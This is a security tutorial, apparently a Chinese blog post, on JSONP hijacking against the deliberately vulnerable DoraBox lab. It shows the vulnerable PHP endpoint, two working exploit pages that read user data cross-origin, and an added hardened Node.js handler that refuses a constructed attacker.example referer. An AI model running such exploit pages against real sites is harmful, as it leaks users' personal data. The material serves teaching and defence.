jsonp cross-domain hijacking vulnerability

Cross-domain JSONP:

  Because the browser's same-origin policy does not restrict what a <script> tag may load, a page can reference a resource on another domain. By dynamically creating a <script> tag you can therefore make a cross-domain request; the server returns the requested data wrapped in a call to a callback function whose name the requester specifies.

 

JSONP vulnerability:

  Target code (DoraBox, csrf/jsonp.php)

<?php
// Intentionally vulnerable DoraBox endpoint: it returns the user's data to any
// page that embeds it, with no check of where the request comes from.
include "../class/function.class.php";
$reqMethod = "GET";
$reqValue = "callback";
$p = new Func($reqMethod, $reqValue);
$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => '[email protected]', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
if(!@$_GET['callback']){
    // No callback parameter: output plain JSON
    echo $p -> con_function('json_encode',$info);
}else{
    // Callback present: HTML-entity encode it, then wrap the JSON in a call to it
    $callback = htmlspecialchars($_GET['callback']);
    echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")";
}
?>

  The code checks whether a callback parameter is present. If not, it outputs the information as plain JSON; if it is, it passes the callback value through htmlspecialchars() (HTML entity encoding) and then outputs the JSON wrapped in that callback.

 

  Exploit code:

  

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>jsonp</title>

</head>
<body>
<script type="text/javascript">
    function test(data) {
        alert(data.username);
    }
    var body = document.getElementsByTagName('body')[0];
    var script = document.createElement('script');
    script.src = 'http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=test';
    body.appendChild(script);

</script>
</body>
</html>

  This generates the request by dynamically inserting a <script> tag.

  The same request using jQuery's $.getJSON():

  

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>JSONPJQUERY</title>
    <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>
</head>
<body>
<script>
    $.getJSON("http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=?",function (data) {
        alert(data.username)
    })
</script>
</body>
</html>
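The endpoint above leaks the user's data because nothing ties the JSONP response to the page that is allowed to read it, and htmlspecialchars() does not constrain the callback to a function name. As an added example (not DoraBox's code and not part of the original post), here is a hardened version of the same endpoint written as a framework-free Node.js handler, so it can be exercised offline against constructed requests. It assumes a hypothetical allowlisted origin https://app.example.com and uses placeholder user data; the same three checks (strict callback name, origin allowlist, correct Content-Type with nosniff) apply equally to the PHP original.

```javascript
'use strict';
// Added example: hardened JSONP handler modelled on DoraBox's csrf/jsonp.php.
// Takes a plain { query, headers } request object and returns
// { status, headers, body }, so it can be unit-tested without a server.

// Constructed sample data standing in for the $info array in jsonp.php.
const USER_INFO = {
  username: 'Vulkey_Chen',
  mobilephone: '13188888888',
  email: 'user@example.com',      // placeholder address
  address: 'example address',     // placeholder address
  sex: 'Cool Man',
};

// Assumed allowlist of page origins permitted to embed this endpoint.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// A callback must be a plain (optionally dotted) JavaScript identifier such as
// "test" or "jQuery18.cb". htmlspecialchars() would let "alert(1)//" through,
// because that string contains no HTML metacharacters at all.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Origin of the embedding page: prefer the Origin header, fall back to the
// origin part of Referer. Returns null when neither is present or parseable.
function requestOrigin(headers) {
  const raw = headers.origin || headers.referer;
  if (!raw) return null;
  try { return new URL(raw).origin; } catch (_e) { return null; }
}

function isAllowedOrigin(headers) {
  const origin = requestOrigin(headers);
  return origin !== null && ALLOWED_ORIGINS.has(origin);
}

// JSON that is also safe inside a <script>: U+2028/U+2029 are legal in JSON
// but end a line in older JavaScript parsers.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

function handleJsonp(req) {
  const headers = {
    'Cache-Control': 'no-store',
    'X-Content-Type-Options': 'nosniff',  // a JSON error body will not be sniffed as script
    'Content-Type': 'application/json; charset=utf-8',
  };
  const callback = req.query.callback;

  // No callback: plain JSON. A cross-site <script> cannot read it, and a
  // cross-site fetch is blocked by the same-origin policy unless CORS allows it.
  if (!callback) {
    return { status: 200, headers, body: JSON.stringify(USER_INFO) };
  }

  if (!isSafeCallback(callback)) {
    return { status: 400, headers, body: JSON.stringify({ error: 'invalid callback' }) };
  }

  // A JSONP body executes in whichever page embeds it, so it is served only
  // to allowlisted origins. A request carrying neither Origin nor Referer
  // (a referrer policy may strip it) is refused rather than trusted.
  if (!isAllowedOrigin(req.headers)) {
    return { status: 403, headers, body: JSON.stringify({ error: 'forbidden' }) };
  }

  headers['Content-Type'] = 'application/javascript; charset=utf-8';
  // The leading "/**/" keeps the first bytes of the response out of the
  // requester's control, the mitigation widely adopted after Rosetta Flash.
  const body = `/**/ ${callback}(${jsonForScript(USER_INFO)});`;
  return { status: 200, headers, body };
}

// Stand-alone demonstration: the exploit page above, hosted on another origin,
// now gets a 403 with no user data.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(handleJsonp({
    query: { callback: 'test' },
    headers: { referer: 'http://attacker.example/exploit.html' },  // constructed
  }));
}
```

With this handler the two exploit pages above, loaded from any origin other than the allowlisted one, receive a 403 and an error body instead of the user record, while the allowlisted page still gets a working JSONP response. Origin is the more reliable signal (the browser sets it and a page cannot forge it), Referer is a fallback that referrer policies may remove, which is why the absence of both is a refusal. For a new endpoint the cleaner design is to drop JSONP entirely and serve plain JSON with CORS, where the browser enforces the origin check and the response is never executable.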

Source: www.cnblogs.com/s-qig57/p/12462833.html